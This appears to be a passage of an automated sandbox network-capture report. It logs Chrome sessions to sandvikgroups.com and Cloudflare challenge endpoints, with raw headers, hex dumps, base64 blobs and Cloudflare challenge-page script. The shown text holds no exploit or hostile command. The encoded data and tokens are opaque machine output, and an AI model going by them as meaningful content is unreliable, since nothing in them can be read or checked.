                                        2025-01-07 21:06:01 UTC1369INData Raw: 44 51 47 6f 36 5a 53 38 70 59 32 42 6d 4d 30 41 32 4c 30 52 4e 65 6b 35 55 55 31 38 36 50 56 69 42 67 56 70 50 50 6f 64 6c 55 33 6c 32 62 56 68 4c 5a 47 6c 6d 55 32 65 44 5a 58 52 6e 6c 58 47 54 57 49 6d 66 58 56 70 61 6f 57 43 50 6b 58 32 57 65 4b 68 68 67 61 71 47 69 36 6d 70 6d 71 71 6d 72 49 69 79 6f 36 2b 4c 6c 6f 74 31 71 37 47 74 65 4a 53 55 66 37 71 75 6d 4c 6e 48 73 59 65 48 78 59 71 4c 77 73 7a 4b 78 74 47 4d 71 4d 61 54 7a 5a 61 58 31 4e 47 50 76 62 61 30 73 72 6a 62 72 36 36 78 78 4b 57 67 31 36 4b 6b 37 4c 76 63 36 4f 71 72 37 63 62 44 79 2b 4b 7a 30 2b 2f 47 37 71 2f 71 74 76 6a 76 2f 41 48 37 38 74 6a 65 78 4e 7a 61 31 64 66 36 45 41 72 67 37 51 2f 72 42 75 49 4c 45 77 59 50 39 39 4d 46 37 50 33 37 32 4e 34 68 38 4f 30 50 47 79 55 57 4a 76
                                        Data Ascii: DQGo6ZS8pY2BmM0A2L0RNek5UU186PViBgVpPPodlU3l2bVhLZGlmU2eDZXRnlXGTWImfXVpaoWCPkX2WeKhhgaqGi6mpmqqmrIiyo6+Llot1q7GteJSUf7qumLnHsYeHxYqLwszKxtGMqMaTzZaX1NGPvba0srjbr66xxKWg16Kk7Lvc6Oqr7cbDy+Kz0+/G7q/qtvjv/AH78tjexNza1df6EArg7Q/rBuILEwYP99MF7P372N4h8O0PGyUWJv
                                        2025-01-07 21:06:01 UTC1369INData Raw: 59 32 42 6d 4d 30 41 32 4c 30 68 56 53 46 52 4c 52 7a 5a 7a 61 6e 53 43 54 49 59 39 67 31 42 30 5a 6e 64 48 50 34 65 43 54 6d 69 50 67 48 31 6b 6a 55 39 54 53 32 61 4d 61 33 56 63 61 47 32 41 6f 33 4f 62 6e 59 52 6e 6e 36 4b 62 6a 4b 53 6c 6a 4b 69 6f 71 71 61 66 71 35 32 33 68 36 2b 4c 6d 48 6d 30 74 58 42 39 63 71 75 38 76 58 5a 38 6c 37 69 30 6b 5a 79 4a 76 34 71 6e 76 36 53 38 72 4b 66 4a 74 62 36 70 79 35 53 37 6d 38 7a 54 79 71 6e 51 31 71 4c 5a 32 63 58 65 74 74 62 66 30 72 54 66 36 39 37 67 76 75 4c 7a 36 73 32 2b 7a 4f 50 48 37 74 62 50 31 39 72 31 7a 4e 72 4f 2f 4c 58 64 30 65 54 32 77 2b 44 7a 36 75 7a 4c 79 41 67 41 30 65 72 64 44 77 72 50 41 67 6e 58 30 78 58 62 36 52 38 42 33 76 7a 64 32 2f 6b 41 46 64 2f 31 39 68 55 6d 48 41 34 4c 36 79 72
                                        Data Ascii: Y2BmM0A2L0hVSFRLRzZzanSCTIY9g1B0ZndHP4eCTmiPgH1kjU9TS2aMa3VcaG2Ao3ObnYRnn6KbjKSljKioqqafq523h6+LmHm0tXB9cqu8vXZ8l7i0kZyJv4qnv6S8rKfJtb6py5S7m8zTyqnQ1qLZ2cXettbf0rTf697gvuLz6s2+zOPH7tbP19r1zNrO/LXd0eT2w+Dz6uzLyAgA0erdDwrPAgnX0xXb6R8B3vzd2/kAFd/19hUmHA4L6yr
                                        2025-01-07 21:06:01 UTC1369INData Raw: 6b 78 37 55 32 64 52 57 30 64 67 55 46 64 43 67 47 42 53 55 6c 39 6a 52 56 52 45 5a 6b 79 41 54 59 31 78 6a 55 5a 56 56 70 47 45 6a 6e 6d 4d 56 33 64 79 69 6d 75 62 62 6f 43 52 65 5a 61 62 6e 35 4a 6a 6e 36 69 43 6f 71 65 6e 6d 61 36 72 73 4a 5a 7a 71 72 47 4e 71 71 32 7a 70 72 71 33 75 58 2b 2f 66 38 54 46 78 34 57 67 76 5a 2b 47 6c 4d 62 4b 72 73 65 66 6f 74 4c 55 70 63 71 68 78 5a 4f 61 6c 63 76 55 74 4c 36 71 73 37 62 4c 75 37 76 5a 73 37 53 6c 70 64 66 58 78 65 33 45 7a 75 50 50 77 39 4c 32 73 73 50 52 34 63 6e 70 76 50 6a 70 38 50 33 74 2b 74 4b 38 7a 64 67 49 38 65 6f 4c 32 51 33 66 44 41 37 72 34 67 67 50 36 77 66 79 7a 2b 72 6b 39 76 66 35 48 68 2f 73 45 50 77 58 49 52 49 69 37 76 6b 68 38 69 54 38 2f 50 59 4b 4d 4f 49 65 41 6a 54 77 2f 52 59 30
                                        Data Ascii: kx7U2dRW0dgUFdCgGBSUl9jRVREZkyATY1xjUZVVpGEjnmMV3dyimubboCReZabn5Jjn6iCoqenma6rsJZzqrGNqq2zprq3uX+/f8TFx4WgvZ+GlMbKrsefotLUpcqhxZOalcvUtL6qs7bLu7vZs7SlpdfXxe3EzuPPw9L2ssPR4cnpvPjp8P3t+tK8zdgI8eoL2Q3fDA7r4ggP6wfyz+rk9vf5Hh/sEPwXIRIi7vkh8iT8/PYKMOIeAjTw/RY0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.449776188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:02 UTC867OUTGET /favicon.ico HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://sandvikgroups.com/?cono
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:02 UTC1285INHTTP/1.1 403 Forbidden
                                        Date: Tue, 07 Jan 2025 21:06:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Resource-Policy: same-origin
                                        Origin-Agent-Cluster: ?1
                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        Referrer-Policy: same-origin
                                        X-Content-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        cf-mitigated: challenge
                                        2025-01-07 21:06:02 UTC961INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 65 53 72 46 6b 2f 76 4a 2b 31 6b 76 2f 64 4e 78 6a 74 6c 69 72 57 47 4a 65 6d 68 36 71 2b 76 36 73 51 64 79 2f 68 66 41 6b 52 7a 63 56 48 6e 47 42 4a 66 32 2b 73 39 79 44 74 7a 36 4a 56 74 4f 4c 56 65 70 45 75 58 62 30 73 75 31 74 64 4b 6f 5a 4e 4d 75 30 35 7a 44 5a 47 66 74 37 69 4f 4f 46 51 64 59 37 62 56 61 2f 46 49 77 66 4f 6a 71 72 76 68 53 4b 30 68 57 64 79 48 53 64 4d 78 55 73 49 6e 5a 31 6a 6b 69 32 4e 6d 45 48 4c 43 35 65 6b 70 35 72 67 3d 3d 24 67 59 46 64 6f 6b 4f 6a 6b 44 44 56 2f 71 38 2b 44 79 76 56 4b 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                        Data Ascii: cf-chl-out: eSrFk/vJ+1kv/dNxjtlirWGJemh6q+v6sQdy/hfAkRzcVHnGBJf2+s9yDtz6JVtOLVepEuXb0su1tdKoZNMu05zDZGft7iOOFQdY7bVa/FIwfOjqrvhSK0hWdyHSdMxUsInZ1jki2NmEHLC5ekp5rg==$gYFdokOjkDDV/q8+DyvVKQ==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                        2025-01-07 21:06:02 UTC1369INData Raw: 32 31 31 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                        Data Ascii: 211e<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                        2025-01-07 21:06:02 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                        Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                        2025-01-07 21:06:02 UTC1369INData Raw: 68 65 6f 62 34 63 4c 2e 42 6d 6b 5f 77 37 35 65 73 33 6f 5a 32 30 33 4b 57 65 43 48 78 58 63 58 59 42 6c 41 51 4b 7a 57 65 70 70 5f 4c 65 44 54 34 61 72 57 6b 76 2e 6a 50 5f 36 74 6a 77 42 33 4e 42 43 56 79 32 39 78 77 33 49 49 48 52 44 65 73 4f 30 6a 47 56 37 57 54 56 57 59 63 49 4d 71 6e 74 71 41 33 67 75 4b 32 36 45 6c 4d 6f 48 6b 77 68 47 63 34 52 62 6a 71 4c 44 71 51 67 41 78 49 54 46 6c 2e 63 59 6f 34 76 58 33 69 50 78 49 49 78 48 5f 35 52 34 5a 31 41 6e 39 67 65 56 4f 68 47 44 65 39 6a 78 61 48 4f 6f 33 39 62 5a 69 36 46 69 63 34 44 4d 71 38 73 58 57 55 34 36 39 51 64 34 38 51 7a 69 69 78 50 62 68 30 6c 52 34 70 63 65 6a 5f 79 57 79 41 6f 67 62 41 75 36 38 66 63 6c 6b 5f 70 73 68 78 70 6d 52 47 4a 55 75 57 46 56 56 74 47 76 66 70 75 66 34 64 55 5a
                                        Data Ascii: heob4cL.Bmk_w75es3oZ203KWeCHxXcXYBlAQKzWepp_LeDT4arWkv.jP_6tjwB3NBCVy29xw3IIHRDesO0jGV7WTVWYcIMqntqA3guK26ElMoHkwhGc4RbjqLDqQgAxITFl.cYo4vX3iPxIIxH_5R4Z1An9geVOhGDe9jxaHOo39bZi6Fic4DMq8sXWU469Qd48QziixPbh0lR4pcej_yWyAogbAu68fclk_pshxpmRGJUuWFVVtGvfpuf4dUZ
                                        2025-01-07 21:06:02 UTC1369INData Raw: 62 30 53 4d 49 49 74 6c 73 6d 39 50 71 44 55 72 39 48 4c 35 35 6e 2e 4e 50 4c 66 59 49 75 53 30 55 76 41 34 6b 38 46 47 66 35 56 49 37 68 61 42 66 52 7a 6d 4c 5f 46 5f 65 30 34 32 7a 76 57 66 39 57 32 68 77 42 67 71 70 35 77 36 79 74 70 35 7a 53 4b 45 74 59 50 55 41 38 4e 37 4c 63 68 76 69 6f 68 74 72 4b 59 57 59 68 44 47 6e 65 34 7a 4c 75 58 4e 4e 62 53 35 46 38 32 45 53 58 37 38 59 42 47 56 67 74 46 53 5f 48 61 6c 61 48 32 50 44 50 31 72 4e 78 56 79 49 71 33 5f 49 6b 67 5a 6b 4b 51 43 39 36 69 63 4b 6c 56 38 55 76 73 74 65 5f 62 4a 31 43 61 74 45 4e 6b 74 69 68 2e 4e 39 34 73 4b 77 49 72 38 6b 67 53 63 2e 78 53 4d 48 6c 39 64 70 4b 53 35 4b 4f 5f 63 32 41 50 6a 58 37 31 66 45 50 48 35 36 74 74 56 52 51 53 70 77 44 34 4e 36 4d 51 5f 35 76 41 6c 62 76 38
                                        Data Ascii: b0SMIItlsm9PqDUr9HL55n.NPLfYIuS0UvA4k8FGf5VI7haBfRzmL_F_e042zvWf9W2hwBgqp5w6ytp5zSKEtYPUA8N7LchviohtrKYWYhDGne4zLuXNNbS5F82ESX78YBGVgtFS_HalaH2PDP1rNxVyIq3_IkgZkKQC96icKlV8Uvste_bJ1CatENktih.N94sKwIr8kgSc.xSMHl9dpKS5KO_c2APjX71fEPH56ttVRQSpwD4N6MQ_5vAlbv8
                                        2025-01-07 21:06:02 UTC1369INData Raw: 6b 78 41 41 47 34 38 59 56 4f 58 49 58 4b 6e 66 70 48 62 6c 67 71 73 65 61 74 57 4d 41 41 58 51 77 6b 32 42 68 61 33 44 62 50 4d 39 4b 74 39 6b 54 37 70 5f 49 4f 35 53 38 79 66 50 41 52 55 61 5f 35 47 43 74 73 39 67 52 53 33 61 46 30 39 5a 62 78 6e 56 6a 79 45 54 53 52 32 4d 6f 67 56 6c 5f 47 55 6e 43 4d 63 4c 69 75 71 54 57 30 61 44 55 4d 6a 4a 61 58 36 4d 4f 70 71 78 68 6f 71 55 42 79 79 56 4f 57 66 31 49 59 58 69 57 7a 64 4e 4b 78 57 37 37 4e 31 7a 30 4b 58 4f 2e 79 59 7a 6c 54 34 50 43 51 51 6d 7a 55 68 58 65 46 5a 52 73 4a 6e 72 64 53 61 57 41 5a 5a 79 62 4d 67 30 30 6f 63 53 39 61 55 42 47 59 41 79 61 48 5f 58 6b 6f 36 35 4f 48 30 7a 4c 76 58 6d 6f 56 65 51 55 66 53 56 6d 6c 68 6f 48 36 49 6c 67 46 59 33 36 63 62 4e 6e 4d 4a 47 5a 69 52 47 30 6e 32
                                        Data Ascii: kxAAG48YVOXIXKnfpHblgqseatWMAAXQwk2Bha3DbPM9Kt9kT7p_IO5S8yfPARUa_5GCts9gRS3aF09ZbxnVjyETSR2MogVl_GUnCMcLiuqTW0aDUMjJaX6MOpqxhoqUByyVOWf1IYXiWzdNKxW77N1z0KXO.yYzlT4PCQQmzUhXeFZRsJnrdSaWAZZybMg00ocS9aUBGYAyaH_Xko65OH0zLvXmoVeQUfSVmlhoH6IlgFY36cbNnMJGZiRG0n2
                                        2025-01-07 21:06:02 UTC1369INData Raw: 58 30 78 70 73 47 36 79 68 63 37 70 63 71 4b 6d 57 6e 65 4a 57 72 33 45 68 77 6b 76 35 45 6a 79 32 6f 4f 35 78 6c 50 45 55 64 6a 53 34 54 44 39 2e 66 71 52 38 49 70 58 58 47 6a 37 61 55 6e 42 54 41 30 79 53 74 70 31 37 32 33 7a 6f 49 34 6d 6c 78 38 74 41 54 36 59 6f 54 77 34 65 75 48 45 74 72 59 6e 75 65 53 78 5f 67 6c 4e 66 2e 77 65 38 68 78 59 39 70 4c 32 56 41 6a 37 5f 59 35 49 41 6c 6d 61 74 4e 4c 39 69 75 31 50 30 46 6b 54 30 49 59 34 69 2e 41 6e 4e 6d 47 4e 58 6c 41 5f 51 46 4b 35 69 48 4c 38 57 4e 57 72 53 4b 4e 59 68 34 58 78 76 33 47 32 36 37 53 46 5a 44 54 43 76 5a 47 49 48 42 41 34 6a 5a 67 4d 50 77 43 35 39 35 7a 48 2e 4a 67 4d 50 75 46 35 4e 55 4b 79 50 70 30 51 43 77 42 65 6a 4f 53 4e 44 6a 4a 73 63 4d 4b 6d 78 7a 62 61 33 67 4d 76 50 55 76
                                        Data Ascii: X0xpsG6yhc7pcqKmWneJWr3Ehwkv5Ejy2oO5xlPEUdjS4TD9.fqR8IpXXGj7aUnBTA0yStp1723zoI4mlx8tAT6YoTw4euHEtrYnueSx_glNf.we8hxY9pL2VAj7_Y5IAlmatNL9iu1P0FkT0IY4i.AnNmGNXlA_QFK5iHL8WNWrSKNYh4Xxv3G267SFZDTCvZGIHBA4jZgMPwC595zH.JgMPuF5NUKyPp0QCwBejOSNDjJscMKmxzba3gMvPUv
                                        2025-01-07 21:06:02 UTC272INData Raw: 37 34 38 35 76 4c 6c 61 32 65 50 38 78 74 46 44 61 6a 4b 76 39 50 38 2d 31 37 33 36 32 38 33 39 36 32 2d 31 2e 30 2e 31 2e 31 2d 53 75 66 5a 74 70 6f 41 41 79 64 30 4d 35 5f 77 52 66 55 4d 63 4c 61 43 6e 35 5a 77 50 63 42 4d 6a 46 41 67 52 51 5a 62 76 4a 67 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 7d 7d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 7d 28 29 29 3b 3c 2f 73 63 72 69 70 74
                                        Data Ascii: 7485vLla2eP8xtFDajKv9P8-1736283962-1.0.1.1-SufZtpoAAyd0M5_wRfUMcLaCn5ZwPcBMjFAgRQZbvJg" + window._cf_chl_opt.cOgUHash);cpo.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(cpo);}());</script
                                        2025-01-07 21:06:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.449777104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:02 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/442655786:1736281748:kg17Jh4QwkIjazyMgCUACxDcKqgDYMNi1u3JYjXPALY/8fe6e8bcbdc57d11/Gt25uDESdAvJ6jww.JeJp3K3qkyx5r7rWJW3NwOWfhg-1736283959-1.1.1.1-zHBdodP33CmwVXOzXIJxOYl7ZcK_vAAcBoIVDvmo4Qzxc5eyAvqOG3Ale2tpAPnN HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:03 UTC379INHTTP/1.1 404 Not Found
                                        Date: Tue, 07 Jan 2025 21:06:03 GMT
                                        Content-Type: application/json
                                        Content-Length: 7
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        cf-chl-out: io6PSR2fop/WqwpYqgX+nCIRhPAwUr00ns0=$a0FnPrEPqs2cS+6U
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8d1189f32dc-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:03 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                        Data Ascii: invalid


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.449778104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:03 UTC812OUTGET /cdn-cgi/challenge-platform/h/g/pat/8fe6e8bcbdc57d11/1736283961787/b7fe36ccacf88b8ba6160e9ac00363e293e2fd6784516cecc5ed9fccfb35fccf/gBU2stsMjJYtGBV HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Cache-Control: max-age=0
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:03 UTC143INHTTP/1.1 401 Unauthorized
                                        Date: Tue, 07 Jan 2025 21:06:03 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 1
                                        Connection: close
                                        2025-01-07 21:06:03 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 74 5f 34 32 7a 4b 7a 34 69 34 75 6d 46 67 36 61 77 41 4e 6a 34 70 50 69 5f 57 65 45 55 57 7a 73 78 65 32 66 7a 50 73 31 5f 4d 38 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gt_42zKz4i4umFg6awANj4pPi_WeEUWzsxe2fzPs1_M8AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                        2025-01-07 21:06:03 UTC1INData Raw: 4a
                                        Data Ascii: J


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.449780104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:04 UTC783OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe6e8bcbdc57d11/1736283961788/nEvdn7auSgI5cmy HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:04 UTC200INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:04 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8d7fc460c78-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:04 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3c 00 00 00 47 08 02 00 00 00 d4 7b b3 27 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDR<G{'IDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.2.449781104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:04 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe6e8bcbdc57d11/1736283961788/nEvdn7auSgI5cmy HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:04 UTC200INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:04 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8dbc9557271-EWR
                                        alt-svc: h3=":443"; ma=86400
